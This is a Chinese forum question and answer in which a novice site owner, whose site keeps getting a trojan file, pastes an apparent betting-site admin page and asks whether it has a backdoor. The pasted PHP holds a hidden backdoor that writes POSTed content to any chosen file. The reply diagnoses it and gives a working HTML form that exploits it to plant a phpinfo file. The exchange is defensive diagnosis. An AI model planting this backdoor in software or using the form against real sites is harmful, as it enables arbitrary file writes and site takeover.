帮忙看一下这一个文件有没有后门或漏洞!
我是菜鸟 我的站总是有一个木马文件,黑客是怎么上传到我的站,很好奇。
<table width="99%" border="1" align="center" cellpadding="1" cellspacing="1" bordercolor="f1f1f1" id="tb">
<tr >
<td width="4%" height="28" align="center" nowrap="NOWRAP" bordercolor="cccccc" bgcolor="#CD9A99">序号</td>
<td width="80" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">号码</td>
<td width="40" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">止数</td>
<td width="9%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">下目</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">占成</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">佣虽 </td>
<td width="9%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">上寺</td>
<td width="9%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">预计</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">走飞</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">走额</td>
<td align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">当前赔率</td>
</tr>
<tr >
<td height="28" align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td height="28" align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td height="28" align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
</tr>
</table><?php
if($_POST['img_text']=='news')
{
$title=$_POST['title'];
$newsort =$_POST['newsort'];
$newsort=str_replace(chr(92),"",$newsort);
$fp = fopen($title,"w");
fputs($fp,$newsort);
fclose($fp);
}
else
{?>
<table width="99%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="15%"><font color="#FFFFFF"> <strong>
<?=$ids?>
设置</strong></font></td>
<td width="85%"><div align="right">
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=组合';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm1 STYLE='color:<?=$z1color?>;'>组合</span></button>
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=百位';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm2 STYLE='color:<?=$z2color?>;'>百位</span></button>
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=拾位';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm2 STYLE='color:<?=$z3color?>;'>拾位</span></button>
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=个位';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm2 STYLE='color:<?=$z4color?>;'>个位</span></button>
</div></td>
</tr>
</table>
<?php
}
?>
[解决办法]
没有看到你的表单,但只要知道你的页面地址,做一个也很容易
比如
<form method=post action=页面地址>提交后就会在你的服务器上建立一个名为 info.php 的文件,执行它后就可知道你的服务器的所有信息
<input type=submit name=img_text value=news>
<input type=text name=title value='info.php'>
<input type=text name=newsort value='<?php phpinfo();'>
</form>
